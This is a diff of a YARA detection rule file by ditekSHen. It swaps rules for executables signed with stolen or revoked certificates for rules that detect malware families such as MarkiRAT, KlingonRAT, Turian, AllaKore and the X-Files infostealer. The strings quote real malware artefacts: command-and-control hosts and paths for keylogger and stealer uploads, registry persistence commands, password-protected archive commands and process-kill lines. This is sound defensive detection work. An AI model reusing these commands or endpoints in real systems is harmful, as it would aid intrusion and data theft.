-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "36:28:b9:3b:cd:90:2b:6b:3e:1f:fd:f2:e1:3d:fc:f5" )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( all of ( $o* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_A32B8B4F1Be43C23Eb2848Ab4Ef06Bb2 : FILE
+rule DITEKSHEN_MALWARE_Win_Gelsevirine : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Gelsevirine"
 		author = "ditekSHen"
-		id = "f0baf7ea-7022-5834-a46c-b67bfbe706d0"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8026-L8039"
+		id = "70f0ed08-4e07-5ab3-968e-95059d20a8e9"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6224-L6254"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "438667b55f23b689627fc1e5bce0e53b960ef51d1a7d3203e398c59bd94ffe93"
+		logic_hash = "60d41d6d789f1cd2a7040d6535f13c69ea58a489035838f047b886e8f1f37f63"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "f7a578c93fd98ade3d259ac47f152d8c9115bc5df7e2f57d107a66db3f833f0f"
-		reason = "NetSupport RAT"
-		importance = 20
+
+	strings:
+		$s1 = /64loadpath(xp|sv|7)/ fullword wide
+		$s2 = "{\"Actions\":[]}" fullword wide
+		$s3 = "PlatformsChunk" fullword wide
+		$s4 = "CurrentPluginCategory" fullword wide
+		$s5 = "CurrentOperationPlatform" fullword wide
+		$s6 = "PersistencePlugins" fullword wide
+		$s7 = "memory_library_file" fullword wide
+		$s8 = "LoadPluginBP" fullword ascii
+		$s9 = "GetOperationBasicInformation" fullword ascii
+		$s10 = "commonappdata/Intel/Runtime" wide
+		$s11 = "cfsst x64" fullword wide
+		$s12 = "ForkOperation" fullword ascii
+		$c1 = "domain.dns04.com:8080;domain.dns04.com:443;acro.ns1.name:80;acro.ns1.name:1863;" wide
+		$c2 = "<base64 content=\"" fullword ascii
+		$c3 = "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" fullword ascii
+		$m1 = "6BDA7FEF-232F-4EA6-8FC8-24F58CD7B366" ascii wide
+		$m2 = "46EBBDC3-EEDC-42D4-BA1D-D454DFCE8E42" ascii wide
+		$m3 = "135054C6-8036-42C7-A97C-31F37D7728BD" ascii wide
+		$m4 = "DC7FDDF7-B2F1-4B99-BE6A-AA683FF11CE6" ascii wide
+		$m5 = "131C8113-E083-4C7F-BEAF-82D73B01F2C5" ascii wide
+		$m6 = "4CCF506D-2F61-4C3A-B9C6-9FA47D43A3FC" ascii wide
+		$m7 = "B2DC745A-66AE-4A19-B11C-AD74D46B7EE0" ascii wide
+		$m8 = "6BDA7FEF-232F-4EA6-8FC8-24F58CD7B366" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pak El AB" and pe.signatures [ i ] . serial == "a3:2b:8b:4f:1b:e4:3c:23:eb:28:48:ab:4e:f0:6b:b2" )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( 2 of ( $c* ) and 4 of ( $s* ) ) or ( 5 of ( $m* ) and ( 1 of ( $c* ) or 3 of ( $s* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_17Ccecc181Ed65A357Edf3B01Df62Cc9 : FILE
+rule DITEKSHEN_MALWARE_Win_Ipsechelper : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects IPsecHelper backdoor"
 		author = "ditekSHen"
-		id = "b692d8dd-e7c9-53cb-8c65-0001c2af3f6f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8041-L8054"
+		id = "f848ac2a-95ad-596a-b193-5cfb424e33a2"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6256-L6279"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d79968633717744ab9e9006f8d958c1e240a1e0f99fd0b4c603d42bb7cd4773c"
+		logic_hash = "be0ecf8a97d289b15b902420d769925b7b22ab835bd7d10d10b059119f41e540"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b64bd77a58c90f76afd6c4ce0b38c54c3c6088b818d0b83e5435d89e3dc01cda"
-		reason = "RedLineStealer"
-		importance = 20
+
+	strings:
+		$s1 = "rundll32.exe advapi32.dll,ProcessIdleTasks" wide
+		$s2 = "CommandExecute" fullword ascii
+		$s3 = "DownloadExecuteUrl" fullword ascii
+		$s4 = "DownloadExecuteFile" fullword ascii
+		$s5 = "CmdExecute" fullword ascii
+		$s6 = "ExecuteProcessWithResult" fullword ascii
+		$s7 = "IsFirstInstance ==> checked" fullword wide
+		$s8 = "del \"%PROG%%SERVICENAME%\".*" fullword wide
+		$s9 = ".CreateConfig" wide
+		$s10 = ".SelfDelete" wide
+		$c1 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; EmbeddedWB 14.52 from: http://www.google.com/ EmbeddedWB 14.52;" wide
+		$c2 = "boot.php" wide
+		$c3 = "lastupdate.php" wide
+		$c4 = "main.php" wide
+		$c5 = "InternetNeeded" wide
+		$c6 = "DeviceIdSalt" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "17:cc:ec:c1:81:ed:65:a3:57:ed:f3:b0:1d:f6:2c:c9" )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 4 of ( $c* ) or 8 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_332Bd5801E8415585E72C87E0E2Ec71D : FILE
+rule DITEKSHEN_MALWARE_Win_Apostle : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Apsotle"
 		author = "ditekSHen"
-		id = "a4e1560f-12e4-5f49-a714-7df939dad513"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8056-L8069"
+		id = "6e6d2ef0-b709-5915-b644-db86d9d3f26a"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6281-L6295"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ad3b1aebedd1ecef9af96da991cdbaca8033e0d48b5e7b776dd3fd3c4024928e"
+		logic_hash = "aa5a522383cbb7e2fdb90f4c4395c7f92f546aa1dbda8f44090225861f011630"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "47338c1a0ea425c47dede188d10ca95288514f369fe8a5105752bd8d906b8cbc"
-		reason = "NetSupport"
-		importance = 20
+
+	strings:
+		$s1 = "bytesToBeEncrypted" fullword ascii
+		$s2 = "SelfDelete" fullword ascii
+		$s3 = "ReadMeFileName" ascii
+		$s4 = "DesktopFileName" ascii
+		$s5 = "SetWallpaper" fullword ascii
+		$s6 = "get_EncryptionKey" fullword ascii
+		$s7 = "disall" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elite Marketing Strategies, Inc." and pe.signatures [ i ] . serial == "33:2b:d5:80:1e:84:15:58:5e:72:c8:7e:0e:2e:c7:1d" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0139Dde119Bb320Dfb9F5Defe3F71245 : FILE
+rule DITEKSHEN_MALWARE_Win_DEADWOOD : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects DEADWOOD"
 		author = "ditekSHen"
-		id = "4962ea0c-ce99-57d3-8848-48dcaab4f346"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8071-L8084"
+		id = "a75e30d8-75ec-5eaf-94f5-5556a3b947ae"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6297-L6313"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b2a7154d73eb9271a181d71d65c73e399bb2f7d1fe031240e94b6ef4c4f7cb18"
+		logic_hash = "bf53abc801971b294e0a23bb0162ceb7c56a563a16e73c317f6a890ba545b67d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "23d13a8e48a6eff191a5d6a0635b99467c2e7242ae520479cae130fbd41cc645"
-		reason = "RedLineStealer"
-		importance = 20
+
+	strings:
+		$s1 = "Service Start Work !!!!" fullword ascii
+		$s2 = "Error GetTokenInformation : " fullword ascii
+		$s3 = "\\Windows\\System32\\net.exe" fullword wide
+		$s4 = "App Start Work !!!!" fullword ascii
+		$s5 = "vmmouse" fullword wide
+		$s6 = "CDPUserSvc_" wide
+		$s7 = "WpnUserService_" wide
+		$s8 = "User is :" wide
+		$s9 = "\\params" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hangil IT Co., Ltd" and pe.signatures [ i ] . serial == "01:39:dd:e1:19:bb:32:0d:fb:9f:5d:ef:e3:f7:12:45" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2F96A89Bfec6E44Dd224E8Fd7E72D9Bb : FILE
+rule DITEKSHEN_MALWARE_Win_Turian : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Hunt for Turian / Qurian"
 		author = "ditekSHen"
-		id = "a905ee22-94c6-5d16-a9a4-a1c1528e4ac2"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8086-L8099"
+		id = "eafa9442-a01b-5044-bc47-634297a3efcc"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6315-L6343"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "94a5721bd3089f46699a947afcd03287712f94754666809e6495b01fc9cd6dcf"
+		logic_hash = "87f4263381c5e93fcba0873aa3bb9a1db4b21225141cd7f06be30f5777a47806"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f13e4801e13898e839183e3305e1dda7f4c0ebf6eaf7553e18c1ddd4edc94470"
-		reason = "Gozi"
-		importance = 20
+		hash1 = "d1218ab9d608ee0212e880204e4d7d75f29f03b77248bca7648d111d67405759"
+		cnc_domain = "windowsupdate[.]dyndns[.]info"
+		cnc_ip = "58[.]158[.]177[.]102"
+
+	strings:
+		$s1 = "%s a -m5 -hp1qaz@WSX3edc -r %s %s\\*.*" ascii wide
+		$s2 = "%s a -m5 -hpMyHost-1 -r %s %s\\*.*" ascii wide
+		$s3 = "%s a -m5 -hp1qaz@WSX3edc -ta%04d%02d%02d000000 -r %s c:" ascii wide
+		$s4 = "%s a -m5 -hpMyHost-1 -ta%04d%02d%02d000000 -r %s c:"
+		$s5 = "cmd /c dir /s /O:D %s>>\"%s\"" ascii wide
+		$s6 = "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v %s /t REG_SZ /d \"%s\" /f" fullword ascii
+		$s7 = "Not Connect!" fullword ascii
+		$p1 = "RECYCLER\\S-1-3-33-854245398-2067806209-0000980848-2003\\" ascii wide
+		$p2 = "%sRECYCLER.{S-1-3-33-854245398-2067806209-0000980848-2003}\\" ascii wide
+		$p3 = "\\RECYCLER.{S-1-3-33-854245398-2067806209-0000980848-2003}\\" ascii wide
+		$p4 = "\\RECYCLER.{645ff040-5081-101b-9f08-00aa002f954e}\\" ascii wide
+		$p5 = "%sRECYCLER.{645ff040-5081-101b-9f08-00aa002f954e}\\" ascii wide
+		$c1 = "CONNECT %s:%u HTTP/1." ascii wide
+		$c2 = "User-Agent: Mozilla/4.0" ascii wide
+		$m1 = "winsupdatetw" fullword ascii wide
+		$m2 = "clientsix" fullword ascii wide
+		$m3 = "updatethres" fullword ascii wide
+		$m4 = "uwatchdaemon" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NAILS UNLIMITED LIMITED" and pe.signatures [ i ] . serial == "2f:96:a8:9b:fe:c6:e4:4d:d2:24:e8:fd:7e:72:d9:bb" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or ( all of ( $c* ) and ( 2 of ( $s* ) or 1 of ( $m* ) or 1 of ( $p* ) ) ) or ( 1 of ( $m* ) and 1 of ( $s* ) and ( 1 of ( $c* ) or 1 of ( $p* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_626735Ed30E50E3E0553986D806Bfc54 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent14 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects downloader injector"
 		author = "ditekSHen"
-		id = "5cab852e-8483-5c38-a396-3a53cf64450a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8101-L8114"
+		id = "6f80567e-b89a-557d-a282-b61c0b99625e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6365-L6378"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "960005fe1a28ddb50261aeaaa850a2410ac03ee9709af2a75485313676c92c53"
+		logic_hash = "2806b553635dbf96e9c00d3554dd5732df64200b3ae2c4845a2675218bd56387"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a1488004ec967faf6c66f55440bbde0de47065490f7c758f3ca1315bb0ef3b97"
-		reason = "Quakbot"
-		importance = 20
+
+	strings:
+		$s1 = "%ProgramData%\\AVG" fullword wide
+		$s2 = "%ProgramData%\\AVAST Software" fullword wide
+		$s3 = "%wS\\%wS.vbs" fullword wide
+		$s4 = "%wS\\%wS.exe" fullword wide
+		$s5 = "CL,FR,US,CY,FI,HR,HU,RO,PL,IT,PT,ES,CA,DK,AT,NL,AU,AR,NP,SE,BE,NZ,SK,GR,BG,NO,GE" ascii
+		$s6 = "= CreateObject(\"Microsoft.XMLHTTP\")" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FISH ACCOUNTING & TRANSLATING LIMITED" and pe.signatures [ i ] . serial == "62:67:35:ed:30:e5:0e:3e:05:53:98:6d:80:6b:fc:54" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4A2E337Fff23E5B2A1321Ffde56D1759 : FILE
+rule DITEKSHEN_MALWARE_Win_Markirat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects MarkiRAT"
 		author = "ditekSHen"
-		id = "60d218b2-5297-59e6-9370-fc0ba036c688"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8116-L8129"
+		id = "6cfa276c-a64e-532a-a1ae-11a9e00867bd"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6380-L6403"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "524048d39de89002efbb8bf75135551b300e03f1126e5e117a4682c79ec04c9a"
+		logic_hash = "17b8bcfe8d2b4c87ff8e0bddb436e18029a3b28a5ad3994fe9bef359588d9cad"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "67099e0c41c102535d388fab1de576433f2ded2b08fb7da1bf66e3bdaba4eeb4"
-		reason = "IcedID"
-		importance = 20
+
+	strings:
+		$pdb = "\\mfcmklg.pdb" ascii
+		$s1 = "runinhome Completed" wide
+		$s2 = "ERROR find next file<br>" wide
+		$s3 = "<br><mark>Hello: %s</mark>" wide
+		$s4 = "<br><mark>CLIPBOARD[" wide
+		$s5 = "@userhome@" wide
+		$s6 = "Global\\{2194ABA1-BFFA-4e6b-8C26-D1BB20190312}" wide
+		$s7 = "taskkill /im svehost.exe /t /f" fullword ascii
+		$s8 = "taskkill /im keepass.exe /t /f" fullword ascii
+		$ba = /bitsadmin \/(addfile|cancel|SetPriority|resume)/ ascii wide
+		$c1 = "/ech/client.php?u=" wide
+		$c2 = "/up/uploadx.php?u=" wide
+		$c3 = "/ech/echo.php?req=rr&u=" wide
+		$c4 = "/ech/rite.php" wide
+		$c5 = "http://microsoft.com-view.space/i.php?u=" wide
+		$c6 = "Content-Disposition: form-data; name=\"uploadedfile\"; filename=\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Karolina Klimowska" and pe.signatures [ i ] . serial == "4a:2e:33:7f:ff:23:e5:b2:a1:32:1f:fd:e5:6d:17:59" )
+		uint16( 0 ) == 0x5a4d and ( ( $pdb and any of them ) or ( 5 of ( $s* ) ) or ( 3 of ( $c* ) ) or ( ( #ba > 3 and 4 of them ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_967Cb0898680D1C174B2Baae5Fa332Db : FILE
+rule DITEKSHEN_MALWARE_Win_Klingonrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects KlingonRAT"
 		author = "ditekSHen"
-		id = "a95f7912-89fc-5c80-96ab-19e6ee2ccafd"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8131-L8144"
+		id = "bea50bce-b38c-50a0-902a-1014615bd9b8"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6405-L6427"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8c68127b29d1a1aa4c1e2033c809fa57466f224c2bb4ede0ffb2b572a3d58c0f"
+		logic_hash = "2abfbfc1b67f931f15bfdfd2cd4ba7821e62eb8c518bbc04629c0dd694bbd9c1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c231f1e6cc3aec983d892e1bc3bb1815335fb24e3e2f611d79bade9a07cbd819"
-		reason = "Babadeda"
-		importance = 20
+
+	strings:
+		$go = "Go build ID:" ascii
+		$s1 = "/UCRelease/src/client/uac/once/"
+		$s2 = "%T\\AppData\\Local\\Windows Update\\"
+		$s3 = "%TSoftware\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"
+		$s4 = "wmic /namespace:'\\\\root\\subscription' PATH"
+		$s5 = "C:\\Windows\\System32\\fodhelper.exeCaption,ParentProcessId,ProcessId"
+		$s6 = "ldpro.exelsass.exeluall.exeluspt.exe"
+		$s7 = "scangui.exedeps/lsass.exeetrustcipe.exefile"
+		$s8 = "alogserv.exeaplica32.exeapvxdwin.exeatro55en.exeautodown.exeavconsol.exeavgserv9.exeavkwctl9.exeavltmain.exeavpdos32.exeavsynmgr.exeavwupd32.exeavwupsrv.exe"
+		$c1 = "%s/keyLogger?machineId=%s" ascii
+		$c2 = "%s/stealer?machineId=%s" ascii
+		$c3 = "%s/lsass?machineId=%s" ascii
+		$c4 = "%s/logger?machineId=%s" ascii
+		$c5 = "%s/machineInfo?machineId=%s" ascii
+		$c6 = "failurehttps://%s:%d/botif-modified-sinceillegal" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "James Caulfield" and pe.signatures [ i ] . serial == "96:7c:b0:89:86:80:d1:c1:74:b2:ba:ae:5f:a3:32:db" )
+		uint16( 0 ) == 0x5a4d and ( $go ) and ( 3 of ( $c* ) or 5 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $c* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_890570B6B0E2868A53Be3F8F904A88Ee : FILE
+rule DITEKSHEN_MALWARE_Win_Xfiles : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects X-Files infostealer (formerly BotSh1zoid)"
 		author = "ditekSHen"
-		id = "8d619117-00cb-5276-87c1-3f6cd701218d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8146-L8159"
+		id = "3f8b2f9b-aa6a-5ffc-95b8-5e44de0d1a49"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6429-L6460"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "952b211cc2c7988b9a09ca5a96c44fea24bbaced28a79ab0ae6732675fda7365"
+		logic_hash = "0c04a8f019aea36f4bba3ce8289c2d608c69d76bbf321052560b4ca2214be057"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "f291d21d72dcefc369526a97b7d39214544b22057757ac00907ab4ff3baa2edd"
-		reason = "Quakbot"
-		importance = 20
+
+	strings:
+		$x1 = "\\BotSh1zoid\\" ascii
+		$x2 = "\\BuildPacker.pdb" ascii
+		$x3 = "\\Svc_host.pdb" ascii nocase
+		$s1 = "WDefender" fullword ascii
+		$s2 = "CheckDefender" fullword ascii
+		$s3 = "RunPS" fullword ascii
+		$s4 = "DownloadFile" fullword ascii
+		$v1_1 = "<Pass encoding=\"base64\">(.*)</Pass>" wide
+		$v1_2 = "Grabber\\" wide
+		$v1_3 = "/log.php" wide
+		$v1_4 = /Browsers\\(Logins|Cards|Cookies)/ wide
+		$v1_5 = "<StealSteam>b__" ascii
+		$v1_6 = "record_header_field" fullword ascii
+		$v1_7 = "JavaScreenshotiptReader" fullword ascii
+		$v1_8 = "HTTPDebuggerPro" wide
+		$v1_9 = "IEInspector" wide
+		$v1_10 = "Fiddler" wide
+		$v2_1 = /get_(Cookie|Logins|Cards)Path/ fullword ascii
+		$v2_2 = "get_AllScreens" fullword ascii
+		$v2_3 = "{0}_{1}_{2}.zip" fullword wide
+		$v2_4 = "\\Stealer" fullword wide
+		$g1 = "$983a3552-4ec3-4936-bd4a-8e6fd67b4c67" fullword ascii
+		$g2 = "$a5d9ca4d-400f-4e07-8c09-a916b548f2e3" fullword ascii
+		$g3 = "$ebc25cf6-9120-4283-b972-0e5520d0000C" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JESEN LESS d.o.o." and pe.signatures [ i ] . serial == "89:05:70:b6:b0:e2:86:8a:53:be:3f:8f:90:4a:88:ee" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 3 of ( $s* ) or 3 of ( $v1* ) or 3 of ( $v2* ) ) ) or 7 of ( $v1* ) or 3 of ( $v2* ) or ( 2 of ( $g* ) and 3 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_7D27332C3Cb3A382A4Fd232C5C66A2 : FILE
+rule DITEKSHEN_MALWARE_Win_Allakore : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects AllaKore"
 		author = "ditekSHen"
-		id = "d9f0d30b-ac9d-57f9-8220-c6a376fe68db"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8161-L8174"
+		id = "371663c1-6faf-5ca3-a79e-e4340d44660b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6462-L6493"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d21218469ae41def8eed3d2cff38744ae928d9e8fed8ff68c539d33193136e0f"
+		logic_hash = "0e93682787e27246cdddbd67ca5360728c65049a2e97e71809b5902854aa4bef"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "935af7361c09f45dcf3fa6e4f4fd176913c47673104272259b40de55566cabed"
-		reason = "Silence"
-		importance = 20
+
+	strings:
+		$x1 = "AllaKore Remote - Chat" fullword wide
+		$x2 = "AllaKore Remote - Share Files" fullword wide
+		$x3 = "CYRUS - Chat" fullword wide
+		$x4 = "CYRUS - Share Files" fullword wide
+		$x5 = "<|REDIRECT|><|GETFOLDERS|>" fullword wide
+		$x6 = "<|REDIRECT|><|DOWNLOADFILE|>" fullword wide
+		$x7 = "<|REDIRECT|><|WHEELMOUSE|>" fullword wide
+		$x8 = "<|REDIRECT|><|SETMOUSE" wide
+		$x9 = "<|CHECKIDPASSWORD|>" fullword wide
+		$x10 = "<|KEYBOARDSOCKET|>" fullword wide
+		$x11 = "<|REDIRECT|><|CLIPBOARD|>" fullword wide
+		$x12 = "<|IDEXISTS!REQUESTPASSWORD|>" fullword wide
+		$x13 = "<|GETFULLSCREENSHOT|>" fullword wide
+		$x14 = "<|MAINSOCKET|>" fullword ascii
+		$s1 = "You can not connect with yourself!" wide
+		$s2 = "Waiting for authentication..." wide
+		$s3 = "Connected support!" wide
+		$s4 = "ID does nor exists." wide
+		$s5 = "Finding the ID..." wide
+		$s6 = "PC is Busy!" wide
+		$s7 = "Upload &  Execute" fullword ascii
+		$s8 = "Download file selected" fullword ascii
+		$s9 = "CaptureKeys_TimerTimer" fullword ascii
+		$s10 = "Remote File Manager" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MALVINA RECRUITMENT LIMITED" and pe.signatures [ i ] . serial == "7d:27:33:2c:3c:b3:a3:82:a4:fd:23:2c:5c:66:a2" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $x* ) or 4 of ( $s* ) or ( 3 of ( $s* ) and 2 of ( $x* ) ) )
 }
-
